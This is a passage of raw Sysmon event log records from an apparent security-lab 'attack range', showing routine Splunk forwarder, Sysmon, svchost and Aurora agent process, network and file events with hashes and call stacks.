Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.310{FE4C2B44-E5EE-63C7-7A06-00000000AF02}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000045923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:27.208{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56448-false10.0.1.12-8089- 23542300x800000000000000045922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.230{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5091D916CCB62D9629D7949E66EDF09B,SHA256=F46E5887EC5BF9756119FA908542A4AAF0C3FF6001C1262D6CFBB8885B495E49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018284Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5EE-63C7-3002-00000000B002}3812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018283Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018282Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018281Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018280Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018279Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018278Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018277Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018276Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018275Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018274Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E5EE-63C7-3002-00000000B002}3812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018273Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5EE-63C7-3002-00000000B002}3812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018272Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.518{E5A8D418-E5EE-63C7-3002-00000000B002}3812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018271Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.205{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C531D43D20482412A2839CEE273B763A,SHA256=0655A5DF5695403512BF6E78490637D62D08F648FBA53E000D4B8D43E6FE1972,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018270Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.037{E5A8D418-E5ED-63C7-2F02-00000000B002}7362968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018269Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.028{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=BA322AC31D0F6DE4F976E3DF5F7E2378,SHA256=97309A6A30FB4C5B220779A61C4E67B03CF08A7A7C7A9FBC39FB0AF8FBC659BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018268Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.005{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5ED-63C7-2F02-00000000B002}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000018267Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.004{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5ED-63C7-2F02-00000000B002}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000018266Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:30.004{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E5ED-63C7-2F02-00000000B002}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 23542300x800000000000000045921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.058{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5ADE043315E664E4AB418DD19E99721,SHA256=5F6D130B8138B3D36DF12163D27147A7906B8B7E2E335B208F62549287D6F47D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018300Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.836{E5A8D418-E5EF-63C7-3102-00000000B002}9244060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018299Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5EF-63C7-3102-00000000B002}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018298Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018297Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018296Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018295Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:31.633{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018294Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 